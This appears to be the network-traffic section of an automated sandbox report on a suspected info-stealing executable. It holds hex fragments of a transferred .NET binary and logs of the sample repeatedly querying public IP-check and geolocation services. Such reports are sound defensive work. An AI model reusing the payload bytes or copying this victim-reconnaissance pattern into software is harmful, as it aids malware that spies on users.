                                              Sep 26, 2024 09:19:22.079852104 CEST224INData Raw: 7b 03 00 00 04 02 7b 0b 00 00 04 28 20 00 00 0a 7d 0b 00 00 04 02 08 7b 01 00 00 04 02 7b 0c 00 00 04 28 21 00 00 0a 7d 0c 00 00 04 02 08 7b 03 00 00 04 02 7b 0d 00 00 04 28 22 00 00 0a 7d 0d 00 00 04 02 02 7b 0e 00 00 04 08 7b 08 00 00 04 28 23
                                              Data Ascii: {{( }{{(!}{{("}{{(#-{+{}{{($-{+{}{{o%Xi:*0#$@Yl#$@(&
                                              Sep 26, 2024 09:19:22.079896927 CEST1236INData Raw: 00 00 0a 28 27 00 00 0a 28 28 00 00 0a 69 7d 10 00 00 04 02 23 00 00 00 00 00 00 24 40 0e 05 0e 04 59 6c 23 00 00 00 00 00 00 24 40 28 26 00 00 0a 28 27 00 00 0a 28 28 00 00 0a 69 7d 11 00 00 04 16 0a 2b 57 00 06 20 90 01 00 00 5a 6b 05 04 59 6b
                                              Data Ascii: ('((i}#$@Yl#$@(&('((i}+W ZkYk[l{],()+(*k"k"Co+{k" A[i(!XY-s,8 ZkYk[l{],()+(*"k"Ck
                                              Sep 26, 2024 09:19:22.079940081 CEST1236INData Raw: 09 00 00 04 6f 39 00 00 0a 11 17 6f 3a 00 00 0a 7b 04 00 00 04 09 59 23 00 00 00 00 00 00 79 40 5a 11 04 5b 13 19 02 7b 09 00 00 04 6f 39 00 00 0a 11 17 6f 3a 00 00 0a 7b 05 00 00 04 09 59 23 00 00 00 00 00 00 79 40 5a 11 04 5b 13 1a 02 7b 09 00
                                              Data Ascii: o9o:{Y#y@Z[{o9o:{Y#y@Z[{o9o:{Y#y@Z[{o9o:{Y#y@Z[1(A+(=kkkko+,,(B#@[Ykkk
                                              Sep 26, 2024 09:19:22.079977036 CEST448INData Raw: 00 00 13 30 02 00 2b 00 00 00 0b 00 00 11 00 03 2c 0b 02 7b 12 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 12 00 00 04 6f 4f 00 00 0a 00 00 02 03 28 52 00 00 0a 00 2a 00 13 30 05 00 a4 00 00 00 0c 00 00 11 00 d0 04 00 00 02 28 53 00 00 0a 73
                                              Data Ascii: 0+,{+,{oO(R*0(SsT(U"A"AsV(W(X ~ sY(Zrpo[tQ(\(]s^(_rp(`r#po3(a(b*0[
                                              Sep 26, 2024 09:19:22.080013037 CEST1236INData Raw: 0a 00 02 7b 2a 00 00 04 02 7b 13 00 00 04 7c 0f 00 00 04 28 19 00 00 0a 28 66 00 00 0a 6f 69 00 00 0a 00 02 7b 27 00 00 04 02 7b 13 00 00 04 7c 0e 00 00 04 28 6a 00 00 0a 17 59 6f 6b 00 00 0a 00 02 7b 2c 00 00 04 02 7b 13 00 00 04 7c 0f 00 00 04
                                              Data Ascii: {*{|((foi{'{|(jYok{,{|(jYok({%{|(l(foi{.{|(l(foi{)smon{*smon{'smoo
                                              Sep 26, 2024 09:19:22.080123901 CEST1236INData Raw: 00 00 02 00 1c 00 24 40 00 0f 00 00 00 00 13 30 04 00 3b 00 00 00 0b 00 00 11 00 02 16 7d 1e 00 00 04 02 7b 30 00 00 04 16 6f 86 00 00 0a 00 02 7b 32 00 00 04 02 7b 31 00 00 04 17 25 0a 6f 86 00 00 0a 00 06 6f 86 00 00 0a 00 02 03 04 28 11 00 00
                                              Data Ascii: $@0;}{0o{2{1%oo(*0;}{1o{2{0%oo(*0;}{2o{0{1%oo(*0
                                              Sep 26, 2024 09:19:22.080177069 CEST448INData Raw: 24 00 00 04 1c 16 1c 16 73 5e 00 00 0a 6f 8d 00 00 0a 00 02 7b 24 00 00 04 72 99 00 00 70 6f 60 00 00 0a 00 02 7b 24 00 00 04 1f 5e 1f 20 73 59 00 00 0a 6f 8e 00 00 0a 00 02 7b 24 00 00 04 1f 0a 6f 8f 00 00 0a 00 02 7b 24 00 00 04 72 a7 00 00 70
                                              Data Ascii: $s^o{$rpo`{$^ sYo{$o{$rpo3{% s0o1{%s^o{%C%soh{%C%sog{%rpo`{%l&sYo{%o
                                              Sep 26, 2024 09:19:22.080213070 CEST1236INData Raw: 18 72 ff 00 00 70 a2 25 19 72 0b 01 00 70 a2 25 1a 72 17 01 00 70 a2 25 1b 72 1f 01 00 70 a2 25 1c 72 29 01 00 70 a2 25 1d 72 33 01 00 70 a2 25 1e 72 41 01 00 70 a2 25 1f 09 72 55 01 00 70 a2 25 1f 0a 72 65 01 00 70 a2 25 1f 0b 72 77 01 00 70 a2
                                              Data Ascii: rp%rp%rp%rp%r)p%r3p%rAp%rUp%rep%rwpo{' s0o1{'s^o{'rpo`{' 'sYo{'o{'smoo{(o{( us0
                                              Sep 26, 2024 09:19:22.080250025 CEST1236INData Raw: 04 1f 41 1f 20 73 59 00 00 0a 6f 8e 00 00 0a 00 02 7b 2d 00 00 04 1f 12 6f 8f 00 00 0a 00 02 7b 2d 00 00 04 72 d5 00 00 70 6f 33 00 00 0a 00 02 7b 2e 00 00 04 20 8c 03 00 00 20 9c 04 00 00 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 2e 00 00 04 1c 1c
                                              Data Ascii: A sYo{-o{-rpo3{. s0o1{.s^o{.C%soh{.C%sog{.rpo`{.l&sYo{.o{.C%soi{/o
                                              Sep 26, 2024 09:19:22.084897041 CEST1236INData Raw: 00 00 04 1f 1b 6f 8f 00 00 0a 00 02 7b 35 00 00 04 72 33 03 00 70 6f 33 00 00 0a 00 02 7b 35 00 00 04 17 6f 95 00 00 0a 00 02 7b 35 00 00 04 02 fe 06 11 00 00 06 73 6d 00 00 0a 6f 99 00 00 0a 00 02 7b 36 00 00 04 17 6f 90 00 00 0a 00 02 7b 36 00
                                              Data Ascii: o{5r3po3{5o{5smo{6o{6@o{6(o{6 os0o1{6s^o{6r9po`{6U$sYo{6o{6rCpo3{6o{6


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.2249162193.122.130.0803508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 09:19:26.832587957 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 09:19:27.301414013 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 787ba4bb939bcdf2d766299b7ae5d52b
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 09:19:27.392745972 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 09:19:27.502219915 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c5e690127df1af047ae7e01861376bb5
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 09:19:28.709939003 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 09:19:28.830696106 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 7511094459e1836318334bfb3b233985
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.2249165132.226.247.73803508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 09:19:29.490706921 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 09:19:30.178728104 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 1faac1b6731a734ceb41d72d8ac0bc6f
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 09:19:30.391808987 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 1faac1b6731a734ceb41d72d8ac0bc6f
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.2249167193.122.130.0803508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 09:19:31.273746014 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 09:19:31.730346918 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:31 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: f9307f143fb7cdea1541829051b4341f
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.2249169132.226.8.169803508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 09:19:32.417438984 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 09:19:33.318089962 CEST272INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:33 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 09:19:33.527750015 CEST272INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:33 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.2249171158.101.44.242803508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 09:19:34.013765097 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 09:19:35.386447906 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:35 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 7fd1da469c7aec1dad3d19f84fbbd14d
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.2249173132.226.8.169803508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 09:19:36.073292971 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 09:19:37.890122890 CEST272INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 09:19:38.095905066 CEST272INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.2249175158.101.44.242803508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 09:19:38.634649038 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 09:19:39.532187939 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: a3780790ce785bdf2618e983a0e57ad0
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.2249177193.122.130.0803508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 09:19:40.194757938 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 09:19:40.650068045 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:40 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c48d5abbacd46f4ee97f28572c9a9c07
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.2249163188.114.97.34433508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 07:19:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 07:19:28 UTC670INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:28 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: EXPIRED
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdpGIiyTV3BTE%2Fhoe7klc%2BldoQP8OsS6KsAxQLNGrFgA7yzGsK7BbVPmysItz4BsK2UikQKs19y9h0DCZ7G97GPPM6%2BzgRLpOPTT9y9%2BiCllUqEiC2q67QkYMNqcKRUYztOS2jIO"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c917c618d034282-EWR
                                              2024-09-26 07:19:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 07:19:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.2249164188.114.97.34433508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 07:19:29 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 07:19:29 UTC678INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:29 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 1
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WAGZdQ54NpGL3mIejwl13H1e0UjE6qbX2ytiHTxUNF7gcoIIbfoOdNCJdfmBX71EN659zi5zNgss%2FAHp7%2B%2B39K0vM00JL%2BALpMfVuNCxkWdqq8%2FVmr%2BYUfmLM8uqQ3csZOJHKx6W"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c917c68ac7943d5-EWR
                                              2024-09-26 07:19:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 07:19:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.2249166188.114.96.34433508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 07:19:30 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 07:19:30 UTC680INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:30 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 2
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hA7N7p03ZtOePoS4q2fvznx968NUb4SMFnY7by%2Br1tcwL%2FPwvdDEaBt0N2moR%2FtH7aZ%2FBDVoUdACuh9qeQ7yCVxDfzTuZlos%2FkC1X3jX%2Fwhd%2BlRVG1HMg8sJdJOZJnMK2SOJ0qh5"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c917c715e110fa9-EWR
